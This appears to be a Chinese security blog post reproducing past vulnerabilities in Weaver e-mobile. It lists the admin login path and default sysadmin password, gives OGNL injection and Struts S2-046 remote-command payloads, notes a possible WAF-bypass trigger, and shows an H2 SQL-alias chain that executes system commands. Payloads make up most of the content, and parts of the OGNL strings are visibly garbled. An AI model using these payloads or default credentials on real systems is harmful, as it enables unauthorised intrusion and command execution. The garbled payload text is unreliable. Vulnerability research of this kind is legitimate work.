0x01 前言
最近在开始写一些高可用的exploit, 顺便分析复现一些 "重要" 应用的历史漏洞, 归纳漏洞点特征, 攒攒审计思路, 毕竟"打点的尽头是挖洞"嘛.
0x02 后台 & 默认账号密码
-
后台地址
/manager/login.do
-
默认账号密码e-mobile常搭配e-cology使用、系统管理员即为e-cology的默认管理员
sysadmin/1
0x03 CNVD-2017-03561 OGNL表达式注入
已测试版本
v6.5
v5.5
漏洞触发点
-
/login.do?message=${}
-
/manager/login.do?message=${}
回显
message=(#_memberAccess=OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print( .apache.commons.io.IOUtils@toString( .lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami .
测试效果
ps: 发现个新的触发点 或许可以用来绕过WAF
0x04 CNVD-2017-07285 S2-046 (S2系列)
已测试版本
v5
S2系列漏洞
回显
filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
测试效果(S2-046)
0x05 CNVD-2021-25287 SQLi to RCE
已测试版本
v6.6
内置H2数据库,可以利用alias别名,调用java代码达到命令执行的效果
CREATE ALIAS EXEC AS
$$ void e(String cmd) throws java.io.IOException
{java.lang.Runtime rt= java.lang.Runtime.getRuntime();rt.exec(cmd);}$$
CALL EXEC('whoami');
测试效果
-
messageType.do
-
client.do
参考资料
https://forum.butian.net/share/84
原文始发于微信公众号(pen4uin):泛微 e-mobile 相关漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论